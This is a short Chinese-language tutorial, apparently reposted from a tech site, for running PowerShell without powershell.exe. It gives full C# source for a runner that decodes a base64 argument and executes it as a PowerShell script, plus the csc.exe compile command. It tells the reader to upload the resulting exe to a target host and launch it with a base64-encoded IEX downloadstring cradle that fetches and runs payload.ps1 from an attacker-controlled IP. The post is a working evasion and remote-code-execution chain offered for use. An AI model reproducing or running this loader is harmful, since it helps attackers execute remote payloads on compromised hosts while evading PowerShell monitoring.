通过代码直接调用System.Management,替代powershell.exe
c#代码,保存为1.cs:
1.using System.Collections.ObjectModel;
2.using System.Management.Automation;
3.using System.Management.Automation.Runspaces;
4.using System.IO;
5.using System;
6.using System.Text;
7.namespace PSLess
8.{
9. class PSLess
10. {
11. static void Main(string[] args)
12. {
13. if(args.Length ==0)
14. Environment.Exit(1);
15. string temp = Base64Decode(args[0]);
16. string s=RunScript(temp);
17. Console.WriteLine(s);
18. Console.ReadKey();
19. }
20. public static string Base64Decode(string s)
21. {
22. return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
23. }
24. private static string RunScript(string script)
25. {
26. Runspace MyRunspace = RunspaceFactory.CreateRunspace();
27. MyRunspace.Open();
28. Pipeline MyPipeline = MyRunspace.CreatePipeline();
29. MyPipeline.Commands.AddScript(script);
30. MyPipeline.Commands.Add("Out-String");
31. Collection<PSObject> outputs = MyPipeline.Invoke();
32. MyRunspace.Close();
33. StringBuilder sb = new StringBuilder();
34. foreach (PSObject pobject in outputs)
35. {
36. sb.AppendLine(pobject.ToString());
37. }
38. return sb.ToString();
39. }
40. }
41.}
利用CSC(编译C#)进行,电脑路径自己找一下,编译:
1.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /out:D:/power_base64.exe 1.cs
将exe上传到目标主机,用base64编码加载:
1.base64编码语句
2.
3.IEX ((new-object net.webclient).downloadstring('http://192.168.0.14/payload.ps1'))
1.Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDMuMTAwLzEvcGF5bG9hZC5wczEnKSk="
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/77642.html
